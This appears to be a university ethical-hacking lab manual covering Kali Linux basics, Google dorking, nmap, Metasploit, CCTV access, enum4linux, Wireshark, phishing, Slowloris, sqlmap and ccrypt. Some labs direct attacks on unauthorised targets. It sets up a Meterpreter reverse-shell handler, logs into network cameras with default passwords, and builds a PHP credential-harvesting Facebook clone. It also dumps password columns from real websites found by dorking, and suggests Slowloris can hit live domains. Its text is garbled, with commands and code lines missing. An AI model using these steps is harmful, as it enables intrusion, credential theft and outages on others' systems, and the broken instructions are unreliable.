Ethical Hacking Lab Manual B6215
Ethical Hacking Lab Manual B6215
Course Objectives:
List of Experiments:
Course Outcomes:
Lab Objectives: The objective of this lab is to demonstrate how to use basic Linux
commands in the terminal.
Theory: Kali Linux is a Linux distribution designed for digital forensics and penetration
testing. It is maintained and funded by Offensive Security. It was developed by Mati Aharoni
and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous
information security testing Linux distribution based on Knoppix. The tagline of Kali Linux
and BackTrack is "The quieter you become, the more you are able to hear".
Kali Linux is based on the Debian Testing branch: most packages Kali uses are imported
from the Debian repositories. Kali Linux has approximately 600 penetration-testing programs
(tools), including Armitage, Nmap, Wireshark, metasploit, John the Ripper, sqlmap,
Aircrack-ng, Burp suite, etc.
The following table provides a very brief list of the standard, well-known, and defined top-
level Kali Linux directories and their purposes. Referencing those directories when accessing
them is accomplished by using the sequentially deeper directory names connected by forward
slashes (/) such as /var/log and /var/spool/mail. These are called paths.
Directory Description
/ The root filesystem is the top-level directory of the filesystem. It contains all
(root of the files required to boot the Linux system before other filesystems are
filesystem) mounted. It must include all of the required executables and libraries
required to boot the remaining filesystems. After the system is booted, all
other filesystems are mounted on standard, well-defined mount points as
subdirectories of the root filesystem.
/root This is not the root (/) filesystem. It is the home directory for the root user.
/home Home directory storage for user files. Each user has a subdirectory in /home.
/home/kali This is the default directory in the terminal. It is represented by ~ symbol.
/bin The /bin directory contains user executable files. Ex: ls, cd, mv etc.
/sbin System binary files. These are executables used for system administration.
/etc Contains the local system configuration files for the host computer.
/tmp Temporary directory. Used by the operating system and many programs to
store temporary files.
/usr These are shareable, read-only files, including executable binaries and
libraries, man files, and other types of documentation.
/usr/bin Contains all the Kali Linux applications (apt, nmap, etc).
/usr/share Contains the application support and data files.
/lib Contains shared library files that are required to boot the system.
/var Variable data files are stored here. This can include things like log files,
MySQL, and other database files, web server data files, email inboxes, and
much more.
/boot Contains the static bootloader and kernel executable and configuration files
required to boot a Linux computer.
/dev This directory contains the device files for every hardware device attached to
the system. These are not device drivers, rather they are files that represent
each device on the computer and facilitate access to those devices.
/media A place to mount external removable media devices such as USB thumb
drives that may be connected to the host.
/mnt A temporary mountpoint for regular filesystems (as in not removable media)
that can be used while the administrator is repairing or working on a
filesystem.
/opt Optional files such as vendor supplied application programs should be
located here.
Step1: Log into Kali Linux machine and open a Terminal Window
Command2: Type ifconfig and hit enter, to see the IP address of the host system.
Command3: Type pwd and hit enter, to print the (present) working directory.
Command4: Type sudo su and hit enter, and enter the password to switch the present user
i.e. kali to super user i.e. root.
Command5: Type exit and hit enter, to return back from root user to the normal user i.e.
kali.
Command6: Type ls and hit enter, to get the files and folders in that directory.
Command8: Type cd .. and hit enter, to go one step back from the current working directory.
Command9: Type nano <filename.txt> and hit enter, it will open the editor.
Enter the text that you want to save in that text file.
Press Ctrl+S to save and Ctrl+X to exit from the editor.
Command10: Type cat <filename.txt> and hit enter to see what is there in that text file.
Command11: Type mkdir <directory name> and hit enter. It will create one
directory/folder.
Command12: Type rm <filename.txt> and hit enter to delete the text file.
Command13: Type rmdir <directory name> and hit enter to delete that directory/folder.
Command14: Type cp <filename.txt> <folder name> and hit enter. It will copy the same
file into that folder. Note: We can copy all types of files using this command.
Command15: Type mv <filename.txt> <folder name> and hit enter. It will move the entire
file to that folder. Note: We can move all types of files using this command.
Command16: Type history and hit enter to get the result. It will show all the commands that
we used in that terminal.
Step2: Close the Terminal Window and Log out from Kali Linux machine.
Viva Questions:
Lab Objectives: The objective of this lab is to demonstrate how to use different types of
dorks for collecting information about a target.
Theory: Google dorking, also called Google hacking, is a search-hacking technique that
uses advanced search queries to uncover hidden information in Google. Google dorks, or
Google hacks, refer to the specific search commands (including special parameters and
search operators) that when entered into the Google search bar reveal hidden parts of
websites.
Google dorking is used to find hidden information that is otherwise inaccessible through a
normal Google search. Google dorks can reveal sensitive or private information about
websites and the companies, organizations, and individuals that own and operate them.
When Google crawls the web to index pages for its search engine, it can see parts of websites
that normal internet users can’t. Google dorks and Google hacks uncover some of that hidden
data, letting you see information that organizations, companies, and website owners may not
want you to see.
A simple example of an advanced search query is the use of quotation marks. Using quotation
marks in searches gives you a list of results that includes web pages where the complete
phrase is used, rather than some combination (complete or incomplete) of the individual
words you entered into the search field.
There are many more types of Google hacks using advanced search queries, but their
technical explanations don’t actually get much more complicated than that. Their power lies
in the ability to use them creatively.
Google dorking is completely legal — it’s just another form of searching after all. Google
was built to handle advanced searches, and banning this functionality would limit information
access.
3. Inurl: Using “inurl:” will search only for pages with that specific text in their URL.
4. Intext: Using “intext:” in a search query will search only for the supplied keywords. In the
example below, all results listed will have the quoted text somewhere on the page.
5. Filetype: Using “filetype:” will narrow our search to the specific file type mentioned.
6. Index of: Using "Index of /" will display the files uploaded on internet by companies,
these files could be very crucial while pen testing.
Lab Objectives: The objective of this lab is to demonstrate how to use nmap commands for
different operations in network scanning.
Theory: Nmap, which stands for "Network Mapper," is an open-source tool that lets you
perform scans on local and remote networks. It is a security auditing tool used in the security
field to actively enumerate a target system/network. It is one of the most extensively used
tools by network administrators and conversely attackers for reconnaissance (enumeration),
the first step in the 5 phases of hacking. Nmap is used to actively probe the target network for
active hosts(host discovery), port scanning, OS detection, version details, and active services
running on the hosts that are up. For this, Nmap uses the technique of sending packets and
analyzing the responses.
Port Scanning is one of the features of Nmap wherein the tool detects the status of the ports
on active hosts in a network. The status of the ports can be open, filtered, or closed. Type
Nmap in the command line to run Nmap. Add necessary switches according to the scanning
type to initiate a specific scan technique.
Open: The open status means that the given port is open and is actively running a
service.
Filtered: The filtered status means that the respective port might be hidden behind a
firewall and its status remains unknown.
Closed: The closed state represents a given port is closed on the host machine.
Procedure: Open the terminal in Kali Linux and install nmap tool.
This is a simple scan in which we will get open ports, state and service of ports, MAC
Address. It is also shows whether the host is up or not. We can also scan the total IP range.
Note: By default, nmap scans for TCP ports (10000) only.
Command 2: nmap -v <IP Address>
v stands for verbose, which is uses to print more information about the scan in progress. we
can use the -v or -vv (very verbose) options to increase the verbosity of the output.
This command will scan and show operating system’s information in detail.
Command 5: nmap -sV <IP Address>
This command will scan for version scanning of all the ports.
T0, T1, T2, T3, T4, and T5 are the timing flags scan to get slow or fast output based on flag.
Viva Questions:
3. How many types of port statuses are there and what are they?
Lab Requirements: Windows system, Kali Linux running as a virtual machine, MSF venom
and MSF console.
MSF console:
MSF console provides a command line interface to access and work with the Metasploit
Framework. The MSF console is the most commonly used interface to work with the
Metasploit Framework. The console lets you do things like scan targets, exploit
vulnerabilities, and collect data.
Modules are the core components of the Metasploit Framework. A module is a piece of
software that can perform a specific action, such as scanning or exploiting. Each task that you
can perform with the Metasploit Framework is defined within a module.
There are a few types of modules. The module type depends on the purpose of the module
and the type of action that the module performs. The following are module types that are
available in the Metasploit Framework:
MSF venom:
MSF venom is a standalone payload generator. It is a combination of MSF payload and MSF
encode. It is fast and uses a single instance. It is also standardized command-line and has core
options. You can generate payloads for many platforms like Cisco, Android, Mac OS,
Solaris, Firefox, Windows, Unix, Node.js and many more. When creating an MSF payload,
there are three common payloads that you would utilize.
The first one is a bind shell. A bind shell is a kind that opens up a new service on the
target machine and requires the attacker to connect to it in order to get a session.
Then of course, we have the reverse TCP payload. A reverse shell (also known as a
connect-back) is the exact opposite: it requires the attacker to set up a listener first on
his/her box, the target machine acts as a client connecting to that listener, and then
finally the attacker receives the shell.
Then we also have the HTTPS payload. Now, what if the victim blocks the TCP
and Bind ports. Well in that case we have an HTTPS port open which is 443.
Once the payload is generated and sent to the victim for execution. When the file is executed
on the victim machine, it will give you a meterpreter session starting from meterpreter >.
Procedure: First of all, check the IP Address of the Kali Linux machine and note it down
(Ex: 192.168.31.128).
Step1: To create a TCP reverse connection payload run the following command
Step4: Use an appropriate handler for our payload. Ex: use exploit/multi/handler
Step5: Set an appropriate payload for our handler. Ex: set payload windows/meterpreter/reverse_tcp
Step6: Now we need to set some payload options like LHOST and LPORT in this step.
Step7: To set LHOST run set LHOST <IP Address> command and To set LPORT run set
LPORT 1234 command and then verify the options again.
Step8: To start listening run the run command and hit enter.
Step9: Now on the windows machine download and run the exe file for one time. It will
create one session in the msfconsole and also it will open a meterpreter session here.
Step10: Now we have the complete control on the victim machine. Here we have different
options to perform on the victim machine. To see them run help command and hit enter.
Not only this we will get more commands that we can execute on the victim machine. Ex:
sysinfo command will display the information related to victim’s system details.
Like this try and practice all the commands that are available there.
Viva Questions:
2. What is msfvenom?
3. What is msfconsole?
6. What is a Payload?
Experiment No. 5
Aim: Perform CCTV hacking using the Advanced IP Scanner tool.
Lab Objectives: The objective of this lab is to know how weak or default credentials are
uses in the process of CCTV camera hacking.
Lab Requirements: Advanced IP Scanner tool, IE Tab extension in Chrome browser, and
Camera plug-ins.
Theory: Closed-circuit television (CCTV) surveillance is one of many investments that more
businesses are prioritizing when protecting their facilities. While it can prove invaluable at
securing our premises and preventing unwanted intrusion or trespassing, one often invisible
threat can hoodwink even the most experienced operatives in the game. It’s ironic
considering video surveillance is meant to prevent unwanted access.
While considerable advances have been made in the world of digital transformation, highly
sophisticated technology like CCTV camera equipment is worryingly vulnerable to hacks.
Cybercriminals and malicious actors have found new techniques to surpass strict security
protocols and gain remote access to a business’s video surveillance systems.
As these systems often keep a proverbial “watchful eye” on valuable assets or entry and exit
points of businesses, it’s crucial to ensure that these modern and innovative camera systems
don’t present themselves as easy bait for cybercriminals.
While some malicious actors may use a simple exploitation method, many of their tactics are
intricate and complex, making it increasingly hard for cybersecurity professionals to detect,
much less contain. Once a surveillance network is compromised, a hacker can monitor our
estate or take control of it. Many organizations are concerningly behind when it comes to
safeguarding their camera equipment, wrongly believing that this technology is inherently
fool-proof and cannot possibly fall into the wrong hands. Sadly, the opposite is very much
true. Let’s look at some of the common vulnerabilities that exist within a business’s CCTV
camera setup.
Remote Hacks: If an IoT (Internet of Things) camera transmits video feeds via the
internet, hackers may find their way into the system through the online IP address
after obtaining the signature information and default password, which many
businesses do not change (more on this later) and which are often not supported by
two-factor authentication (2FA).
Local Hacks: CCTV cameras are often hooked into a network wireless router with a
built-in modem, and organizations do not always update the default network name
and password. If a hacker cannot gain access to the cameras themselves, they can
access the network and weave their way into the cameras that are connected to it.
They will often spoof the wireless network into thinking they are registering an
authentic device, or try and overload the network by denial-of-service (DoS).
Backdoor Attacks: Backdoors provide unauthorized access to a computer system or
encrypted data that bypasses the infrastructure’s primary security controls. Backdoors
may often be created for the purposes of legitimate troubleshooting or remote access
in the event of a fault. However, threat actors can locate these backdoors, often as a
result of unpatched or outdated security software, firewalls, and firmware. Hackers
can usually spot these vulnerabilities with ease.
Brute Force: These types of attacks occur when hackers try to guess an
administrator’s login credentials manually, often with the assistance of algorithms that
can make numerous guesses within seconds. Whether the username is used alongside
passwords or PIN combinations, many organizations fail to adopt a strong password
policy for all of their users’ shared equipment, meaning that default passwords like
“1234,” “password,” “0000,” or “administrator” are very easy to exploit.
Procedure:
It will show all the shared folders, printers, scanners, servers, routers, RDPs, CCTV
cameras and so on in it. It will also show the live and dead devices on that specific network.
Step5: Double click on your target link. It will be open in chrome browser. Do not try to
login here.
Click on extensions and select IE Tab. We should open the camera in IE Tab only.
Ex: Usernames: admin, Admin & Passwords: admin, admin@123, admin123, 12345, 123456.
If the entered username and password are correct it will open the Live View.
Note: We can perform no of different operations using this dashboard.
Note: Do not change anything because if you change anything you will be behind bars.
Viva Questions:
Lab Objectives: The main objective of this lab is to understand better about a domain’s
management.
Theory:
Nslookup:
Nslookup (stands for “Name Server Lookup”) is a useful command for getting information
from the DNS server. It is a network administration tool for querying the Domain Name
System (DNS) to obtain domain name or IP address mapping or any other specific DNS
record. It is also used to troubleshoot DNS-related problems.
Nslookup syntax:
The Nslookup syntax is very simple, and we can use it the same on different OSes.
(or)
Options: First, we will put the option we want to use with the domain name or IP address.
The option can be related to the type of DNS record, timeout, a port in use, debugging, or
another.
Name: Here we will put the hostname (domain name) or IP address. It is the target of our
DNS query.
Additional Options: Depending on the query, we can add an extra option as a parameter.
Server: We can use the default server for our query or specify another one from where we
want the DNS query to be performed.
The Nslookup command is a very popular and powerful tool. So, it is not a surprise that a lot
of administrators use it for testing and troubleshooting their networks. There are two main
reasons why we need to use the Nslookup command.
The first one is obviously for troubleshooting server connections. Thanks to its
beneficial functionalities, we can get the information we need quickly. In addition, it
is extremely easy to use, and it is available on every operating system (OS).
The second reason is not so obvious, but it should not be neglected. That is security
and safety. It can be helpful for protecting against different phishing attacks, which
involve falsifying a domain name. Attackers use a misspelled domain name or trick
users by adding or omitting a hyphen. Some examples are when they replace the
numeral 1 for a lowercase l (examp1e.com), or the phishing domain could be insta-
gram.com instead of instagram.com. These tactics are used to trick regular users and
make it seem that an unfriendly site looks friendly and familiar.
Nslookup can also help to prevent another malicious attempt – DNS cache poisoning.
With this attack, criminals place fraudulent data and distribute it to the DNS recursive
servers, pointing to a fake authoritative server.
Procedure:
We can use this command to see how many A records are there and see the IP Addresses of
each one.
By checking the NS records, we can see which is the authoritative server for a specific
domain.
With this one, we can see the start of authority and get information about the zone.
Command: nslookup -type=soa cloudns.net
No 4: To find the MX records responsible for the email exchange.
Here we are checking the MX records of the mail servers. We can see if all the mail servers
are working well.
Many times, we check the A records to see the IPs of a domain, but sometimes we need to
verify if an IP address is related to a specific domain. For that purpose, we need a reverse
DNS lookup.
We can manually choose the timeout time in seconds. We can increase it to give more time
for the server to respond. We can also shorter it to see which servers can respond quicker.
Debug mode provides important and detailed information both for the question and for the
received answer.
Lab Objectives: The objective of this lab is to help students understand and enforce various
enumeration techniques to enumerate:
Connected devices
Hostname and information
Domain
Hardware and storage information
Software components
Total Memory
Theory: The Enum4linux tool is an alternative to enum.exe for enumerating data from
Windows and Samba hosts.
Overview:
Enum4linux is a tool for enumerating information from Windows and Samba systems. It
attempts to offer similar functionality to enum.exe formerly available from
www.bindview.com.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net
and nmblookup.
Dependencies:
We need to have the Samba package installed as this script is basically just a wrapper around
rpcclient, net, nmblookup and smbclient.
The following command will attempt to enumerate information provided valid login
credentials.
Command Reference:
Username: john
Password: password123
Command:
Procedure: Open the Kali Linux Terminal Window. ( or we can go to -> Applications -> 01-
Information Gathering -> SMB Analysis -> enum4linux ).
Step1: In the terminal window type enum4linux -h command and hit Enter to get the help
options of enum4linux.
Help options appear as shown in the screenshot. Now in this lab, we will demonstrate only a
few options to conduct enumeration on the target machine.
Step2: Type enum4linux <IP Address> command and hit enter. We will get all the
information about our target machine here.
Step3: Type enum4linux -U <IP Address> command and hit enter. To see the user list in
that target machine.
Step4: Type enum4linux -P <IP Address> command and hit enter. To see the password
policy information in that target machine.
Step5: Type enum4linux -S <IP Address> command and hit enter. To see the share list in
that target machine.
Step6: Type enum4linux -G <IP Address> command and hit enter. To see the group and
member list in that target machine.
Step7: Type enum4linux -a <IP Address> command and hit enter. To do all simple
enumeration (-U -S -G -P -r -o -n -i) in that target machine.
Step8: Type enum4linux -U -o <IP Address> command and hit enter. To see the user list
and OS details in that target machine.
Viva Questions:
1. What is an Enumeration?
Lab Objective: The objective of this practical is to study and understands the concept of
network sniffing using Wireshark.
Theory: Computers communicate using networks. These networks could be on a local area
network LAN or exposed to the internet. Network Sniffers are programs that capture low-
level package data that is transmitted over a network. An attacker can analyze this
information to discover valuable information such as user ids and passwords.
Network sniffing is the process of capturing data packets sent over a network. This can
be done by the specialized software program or hardware equipment. Sniffing can be used to;
The above protocols are vulnerable if login details are sent in plain text Wireshark is a free
and open-source packet analyzer. It is used for network troubleshooting, analysis, software
and communications protocol development, and education. Wireshark is cross-platform,
using the Qt widget toolkit in current releases to implement its user interface, and using pcap
to capture packets; it runs on Linux, macOS, BSD, Solaris, some other Unix-like operating
systems, and Microsoft Windows. There is also a terminal-based (non-GUI) version called
TShark. Wireshark is used to capture and analyse packets in network. It is also used as a
sniffer, network protocol analyzer, and network analyzer. We can also apply specific filter on
network traffic to get more filtered data packets.
Color Coding:
Different packets are seen highlighted in various different colors. This is Wireshark’s way of
displaying traffic to help you easily identify the types of it. Default colors are:
To check the color coding rules, click on View and select Coloring Rules. These color-coding
rules can be customized and modified to fit your needs.
Procedure:
Step1: Open the terminal in Kali Linux and type wireshark and hit enter to open the tool.
Step2: Select eth0 and click on Start capturing packets icon. It will start capturing.
Step3: Now start any browser and open this webpage http://testphp.vulnweb.com/login.php.
Step4: Enter Username and Password and click on login button.
Step5: Now get back to wireshark tool and click on Stop capturing packets icon.
Step6: Now type http.request.method == "POST" in the search bar and hit enter.
Step7: Click on HTML Form URL Encoded. We can see the previously entered Username
and Password here.
Viva Questions:
1. What is Wireshark?
Lab Objectives: To know how to create social media login page for phishing attacks.
Theory: Phishing is a form of social engineering where attackers deceive people into
revealing sensitive information or installing malware such as ransomware. Phishing attacks
have become increasingly sophisticated and often transparently mirror the site being targeted,
allowing the attacker to observe everything while the victim is navigating the site, and
transverse any additional security boundaries with the victim.
Types of Phishing:
Email Phishing: In an email phishing scam, the attacker sends an email that looks
legitimate, designed to trick the recipient into entering information in reply or on a
site that the hacker can use to steal or sell their data.
Spear Phishing: Spear phishing involves targeting a specific individual in an
organization to try to steal their login credentials. The attacker often first gathers
information about the person before starting the attack, such as their name, position,
and contact details.
Angler Phishing: Anglers use fake social media posts to get people to provide login
info or download malware.
Smishing: Smishing is phishing through some form of a text message or SMS.
Vishing: Vishing, which is short for "voice phishing," is when someone uses the
phone to try to steal information. The attacker may pretend to be a trusted friend or
relative or to represent them.
HTTPS Phishing: An HTTPS phishing attack is carried out by sending the victim an
email with a link to a fake website. The site may then be used to fool the victim into
entering their private information.
Pop-up Phishing: Pop-up phishing often uses a pop-up about a problem with your
computer’s security or some other issue to trick you into clicking. You are then
directed to download a file, which ends up being malware, or to call what is supposed
to be a support center.
Pharming: In a pharming attack, the victim gets malicious code installed on their
computer. This code then sends the victim to a fake website designed to gather their
login credentials.
Evil Twin Phishing: In an evil twin attack, the hacker sets up a false Wi-Fi network
that looks real. If someone logs in to it and enters sensitive details, the hacker captures
their info.
Watering Hole Phishing: In a watering hole phishing attack, a hacker figures out a
site a group of users tends to visit. They then use it to infect the users’ computers in
an attempt to penetrate the network.
Whaling: A whaling attack is a phishing attack that targets a senior executive. These
individuals often have deep access to sensitive areas of the network, so a successful
attack can result in access to valuable info.
Clone Phishing: A clone phishing attack involves a hacker making an identical copy
of a message the recipient already received. They may include something like
“resending this” and put a malicious link in the email.
Website Spoofing: With website spoofing, a hacker creates a fake website that looks
legitimate. When you use the site to log in to an account, your info is collected by the
attacker.
Domain Spoofing: Domain spoofing, also referred to as DNS spoofing, is when a
hacker imitates the domain of a company—either using email or a fake website—to
lure people into entering sensitive information. To prevent domain spoofing, you
should double-check the source of every link and email.
Deceptive Phishing: Deceptive phishers use deceptive technology to pretend they are
with a real company to inform the targets they are already experiencing a cyberattack.
The users then click on a malicious link, infecting their computer.
Image Phishing: Image phishing uses images with malicious files in them meant to
help a hacker steal your account info or infect your computer.
Search Engine Phishing: A search engine phishing attack involves an attacker
making fake products that look attractive. When this pop up in a search engine, the
target is asked to enter sensitive information before purchasing, which then goes to a
hacker.
Procedure:
Step1: First open any one social media website’s login page and copy the source code and
save it in the name of index.html. (In our case it is Facebook login page).
Step2: Create an empty text (log.txt) file. This file helps us to save credentials.
Step3: Create a php file in the name of post.php, to connect html file with the text file and to
redirect to the original website.
Post.php
<?php
fwrite($file, $variable);
fwrite($file, "=");
fwrite($file, $value);
fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);
exit;
?>
Step4: Replace action attribute value with post.php and keep id attribute value empty in
the form tag of index.html file.
Note: Save these three files in one folder (phishing) and save the folder in the Xampp’s
htdocs folder.
Step5: Start Xampp and open the folder in localhost using any browser.
Step6: Enter Email address or phone number and Password and click on Log in. It will
redirect to the original Facebook login page. (You can check it in the URL section. Both are
different URLs. One is localhost and another is actual Facebook URL.)
1. What is phishing?
2. What is whaling?
3. What is smishing?
Lab Objectives: To know how HTTP Denial of Service attack affects threaded servers.
Theory: Slowloris is a free and Open-source tool available on GitHub. We can perform a
denial-of-service attack using this tool. It’s a framework written in python. This tool allows a
single machine to take down another machine’s web server it uses perfectly legitimate HTTP
traffic. It makes a full TCP connection and then requires only a few hundred requests at long-
term and regular intervals. As a result, the tool doesn’t need to spend a lot of traffic to
exhaust the available connections on a server.
Uses of Slowloris:
Slowloris sends multiple requests to the target as a result generates heavy traffic
botnets.
Slowloris can be used to perform DDoS attacks on any webserver.
It is an open-source tool, so you can download it from GitHub free of cost.
It uses perfectly legitimate HTTP traffic.
A denial-of-service attack can be executed with the help of Slowloris by generating
heavy traffic of botnets.
Procedure:
Step1: Open Kali Linux and then open the Terminal. Create a new directory on desktop
named Slowloris and Move to that directory using the following commands.
cd Desktop
mkdir Slowloris
cd Slowloris
Step2: Now we have to clone the Slowloris tool from GitHub in the same directory using the
following command.
Step3: Now go to the Action bar and click on split terminal vertically then we will see that
the two-terminal screen has been open now.
Step4: Now we have to check the IP address of our kali machine to do that type of following
command in the right-side terminal.
ifconfig
Step5: Now it’s time to start the apache server. Start the apache server using the following
command in the right-side terminal.
Step7: We can see that our server is under active status it means it is running properly and to
check permissions run the following commands in the left-side terminal.
cd slowloris
ls -l
Step8: Now it’s time to run the tool using the following command in the left-side terminal.
python3 slowloris.py <our IP address> -s 500
Step9: We can see the tool has started attacking that particular IP address which we have
given now to check whether its working or not go to any browser and on the URL bar type
that IP address, and we will see the “ Problem loading page ” this is how Slowloris tool
works.
Note: As we can see here the browser is waiting for an IP address because the browser is not
able to load the page, this is because the denial-of-service attack is happening behind the
browser using slowloris tool if we want to attack the live website we can attack using the
domain name of that website instead of giving the IP address of the system to the slowloris
tool. Slowloris tool will start attacking that particular domain however it’s a crime, and we do
not promote such type of activity the experiment was only for education purposes.
Viva Questions:
Lab Objectives: The objective of this lab is to help students learn how to perform a SQL
injection and extract databases.
Theory: SQL injection (SQLi) is a cyberattack that injects malicious SQL code into an
application, allowing the attacker to view or modify a database. SQL injection attacks can
have a significant negative impact on an organization. When a malicious user successfully
completes an SQL injection attack, it can have any of the following impacts:
Exposes sensitive company data: Using SQL injection, attackers can retrieve and
alter data, which risks exposing sensitive company data stored on the SQL server.
Compromise users’ privacy: Depending on the data stored on the SQL server, an
attack can expose private user data, such as credit card numbers.
Give an attacker administrative access to our system: If a database user has
administrative privileges, an attacker can gain access to the system using malicious
code. To protect against this kind of vulnerability, create a database user with the least
possible privileges.
Give an attacker general access to our system: If we use weak SQL commands to
check user names and passwords, an attacker could gain access to our system without
knowing a user’s credentials. With general access to our system, an attacker can cause
additional damage accessing and manipulating sensitive information.
Compromise the integrity of our data: Using SQL injection, attackers can make
changes to or delete information from our system.
SQL injection attacks are fall into three categories: In-band SQL injection, Inferential SQL
injection and Out-of-band SQL injection.
In-band SQL injection is the most common type of attack. With this type of SQL injection
attack, a malicious user uses the same communication channel for the attack and to gather
results. The following techniques are the most common types of in-band SQL injection
attacks:
Error-based SQL injection: With this technique, attackers gain information about
the database structure when they use a SQL command to generate an error message
from the database server. Error messages are useful when developing a web
application or web page, but they can be a vulnerability later because they expose
information about the database. To prevent this vulnerability, we can disable error
messages after a website or application is live.
Union-based SQL injection: With this technique, attackers use the UNION SQL
operator to combine multiple select statements and return a single HTTP response. An
attacker can use this technique to extract information from the database. This
technique is the most common type of SQL injection and requires more security
measures to combat than error-based SQL injection.
Inferential SQL injection is also called blind SQL injection because the website database
doesn’t transfer data to the attacker like with in-band SQL injection. Instead, a malicious user
can learn about the structure of the server by sending data payloads and observing the
response. Inferential SQL injection attacks are less common than in-band SQL injection
attacks because they can take longer to complete. The two types of inferential SQL injection
attacks use the following techniques:
Boolean injection: With this technique, attackers send a SQL query to the database
and observe the result. Attackers can infer if a result is true or false based on whether
the information in the HTTP response was modified.
Time-based injection: With this technique, attackers send a SQL query to the
database, making the database wait a specific number of seconds before responding.
Attackers can determine if the result is true or false based on the number of seconds
that elapses before a response. For example, a hacker could use a SQL query that
commands a delay if the first letter of the first database’s name is A. Then, if the
response is delayed, the attacker knows the query is true.
Out-of-band SQL injection is the least common type of attack. With this type of SQL
injection attack, malicious users use a different communication channel for the attack than
they use to gather results. Attackers use this method if a server is too slow or unstable to use
inferential SQL injection or in-band SQL injection.
Procedure:
Step1: Open the Terminal and move to root user using the following command.
Step2: Open any browser and search for vulnerable websites using the following dork.
Step3: In the terminal window type sqlmap -u URL --dbs and hit enter button. This query
will retrieve the databases information. ( Note: Select http site only)
Step4: Now, we need to choose a database and retrieve the tables in the database. Type
sqlmap -u URL DBName --tables (or) sqlmap -u URL -D DBName --tables and hit enter
button. ( Wait for the results).
Step5: Now, we need to retrieve the columns associated with the tables. Type sqlmap -u
URL -D DBName -T TableName --columns and hit enter button.
Step6: To get the information related to any column type sqlmap -u URL -D DBName -T
TableName -C ColumnName –dump and hit enter. In this experiment we will retrieve
information from u_login, u_name and u_password columns.
Viva Questions:
Lab Objectives: The main objective of this lab is to know how to encrypt and decrypt text
files.
Theory: Ccrypt is a command line tool for encryption and decryption of data. Ccrypt is based
on the Rijndael cipher, the same cipher used in the AES standard. On the other hand, in the
AES standard, a 128-bit block size is used, whereas ccrypt uses a 256-bit block size. Ccrypt
commonly uses the .cpt file extension for encrypted files.
It is a lightweight tool; the installation and use of this tool is pretty easy.
It is designed to overcome the shortcomings of standard Unix crypt utility.
Ccrypt Manual:
-e, –encrypt: Encrypt. This is the default mode. If filename arguments are given,
encrypt the files and append the suffix .cpt to their names. Otherwise, run as a filter.
-d, –decrypt: Decrypt. If filename arguments are given, decrypt the files and strip the
suffix .cpt from the filenames, if present. Otherwise, run as a filter.
-c, –cat: Decrypt one or more files to standard output. If no filename arguments are
given, decrypt as a filter. Implies -l.
-x, –keychange: Change the key of encrypted data. In this mode, ccrypt prompts for
two passwords: the old one and the new one. If filename arguments are given, modify
the files. Otherwise, run as a filter.
-u, –unixcrypt: Simulate the old Unix crypt command. Note: the cipher used by Unix
crypt has been broken and is not secure. Please use this option only to decrypt existing
files. If filename arguments are given, decrypt the files to stdout. Otherwise, run as a
filter. Note that for the Unix crypt format, there is no easy way to detect whether a
given key matches or not; thus, for safety, this mode does not overwrite files.
Procedure:
Step1: Open the Terminal window in the Kali Linux and install ccrypt tool.
sudo apt-get install ccrypt
Note: If needed update the Kali Linux packages (sudo apt-get update).
ccrypt -h
Step3: Now create a text file, enter some text and read it.
nano practice.txt ( ctrl+s to save the file and ctrl+x to exit from the editor)
cat practice.txt
Step4: To encrypt the text file, we need to enter the following command. Enter the
encryption key for two times.
ccrypt -e filename.txt
Step5: Now try to read the file. It will show the unusual text, that means encryption is
successful.
cat practice.txt.cpt
Step6: To decrypt the file, we need to enter the following command. Enter the decryption
key (encryption and decryption both keys are same).
Step7: Now try to read the text file again, it will show the text. It means decryption is
successful.
Viva Questions:
1. What is encryption?
2. What is decryption?
4. What is cipher?